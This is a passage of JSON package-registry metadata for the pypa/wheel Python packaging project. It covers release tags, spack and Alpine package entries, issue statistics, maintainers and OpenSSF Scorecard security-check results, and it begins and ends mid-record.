320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:25.907Z","dependent_packages_count":2620,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.027789356676392943,"stargazers_count":11.254689453939141,"forks_count":9.267750451577045,"average":5.137557315548145},"purl":"pkg:spack/py-wheel","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/spack/py-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/spack/py-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/spack/py-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-wheel/codemeta","maintainers":[{"uuid":"adamjstewart","login":"adamjstewart","name":null,"email":null,"url":"https://github.com/adamjstewart","packages_count":2168,"html_url":null,"role":null,"created_at":"2022-11-14T16:56:28.241Z","updated_at":"2022-11-14T16:56:28.241Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers/adamjstewart/packages"}],"registry":{"name":"spack.io","url":"https://packages.spack.io","ecosystem":"spack","default":true,"packages_count":9208,"maintainers_count":989,"namespaces_count":0,"keywords_count":3801,"github":"spack","metadata":{"funded_packages_count":440},"icon_url":"https://github.com/spack.png","created_at":"2022-04-04T15:19:23.514Z","updated_at":"2026-06-10T05:19:56.194Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/namespaces"}},{"id":6186686,"name":"py3-wheel-doc","ecosystem":"alpine","description":"built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_number":"0.36.2-r2","last_synced_at":"2026-04-01T09:00:49.081Z","created_at":"2023-02-01T00:59:16.596Z","updated_at":"2026-04-01T09:00:49.082Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.14/main/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[]},"repo_metadata_updated_at":"2025-10-30T04:12:46.806Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":21.680705976734856,"stargazers_count":8.249766011498863,"forks_count":6.89931809065383,"average":9.207447519721887},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.14","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":17,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-04T09:49:18.095Z","updated_at":"2023-02-04T09:49:18.095Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.14","url":"https://pkgs.alpinelinux.org/packages?branch=v3.14","ecosystem":"alpine","default":false,"packages_count":14958,"maintainers_count":258,"namespaces_count":2,"keywords_count":2179,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":675},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.706Z","updated_at":"2026-06-10T05:14:53.730Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/namespaces"}},{"id":10330750,"name":"py3-wheel-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-wheel","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":2,"first_release_published_at":"2024-04-12T09:43:36.000Z","latest_release_published_at":"2026-04-22T18:33:23.000Z","latest_release_number":"0.42.0-r2","last_synced_at":"2026-05-11T14:20:25.979Z","created_at":"2024-06-11T02:38:28.770Z","updated_at":"2026-05-11T14:20:25.979Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.20/main/x86_64/py3-wheel-pyc","install_command":"apk add py3-wheel-pyc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least 